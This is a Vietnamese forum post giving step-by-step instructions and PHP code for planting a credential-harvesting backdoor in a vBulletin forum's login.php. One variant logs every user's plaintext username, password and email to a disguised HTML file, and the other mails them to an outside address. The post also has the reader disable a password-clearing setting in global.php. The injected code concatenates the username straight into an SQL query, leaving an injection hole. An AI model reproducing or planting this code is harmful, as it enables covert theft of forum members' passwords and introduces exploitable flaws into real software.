Hướng Dẫn Chèn Keylogger Vào Forum VBB

Thảo luận trong 'Xenforo' bắt đầu bởi Admin, 8 Tháng sáu 2016.

 1. Admin Nothing to lose.. your love to win.. Chuyển tiền

  Bài viết:
  Tìm chủ đề
  4,920
  Mở file login.php tìm dòng process_new_login(....)

  Chính xác là:

  Mã:
  process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
  Thêm vào bên dưới:

  Mã:
  $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
  $lg_password = $vbulletin->GPC["vb_login_password"];
  $lg_file = "./clientscript/yui/animation/index1.html";
  $sql_query = @mysql_query("SELECT * FROM `" . TABLE_PREFIX . "user` WHERE username='" . $lg_username . "'");
  while($row = @mysql_fetch_array($sql_query)) {
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) {
      $logfile = @file($lg_file);
      $logfile[] = $lg_username . ":" . $lg_password.":" . $row["email"];
      $logfile = array_unique($logfile);
        
      $fp1 = fopen($lg_file, "w");
      fwrite($fp1, implode("\r\n", $logfile));
      fclose($fp1);
    }
    break;
  }
  Hoặc:

  Mã:
  $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
  $lg_password = $vbulletin->GPC["vb_login_password"];
  $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
  while($row = @mysql_fetch_array($sql_query)) {
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) {
      $from = $row["usergroupid"].' | '.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
      $to = "[email protected]";
      $message = $row["usergroupid"] . ' | ' . $lg_username . ' | ' . $lg_password. ' | ' . $row["email"] . "\n";
      $header = "Content-type: text/html; charset=utf-8\r\nFrom: $from\r\nReply-to: $to";
      mail($to, $from, $message, $header);
      }
  }
  Edit file Global.php, tìm:

  Mã:
  $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
  Thêm 2 dấu chú thích vào trước nó để biến nó thành chú thích, ta sẽ được:

  Mã:
  //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
  File log coi tại: /clientscript/yui/animation/index1.html
   
 2. Đang tải...
Từ Khóa:
Trả lời qua Facebook
Đang tải...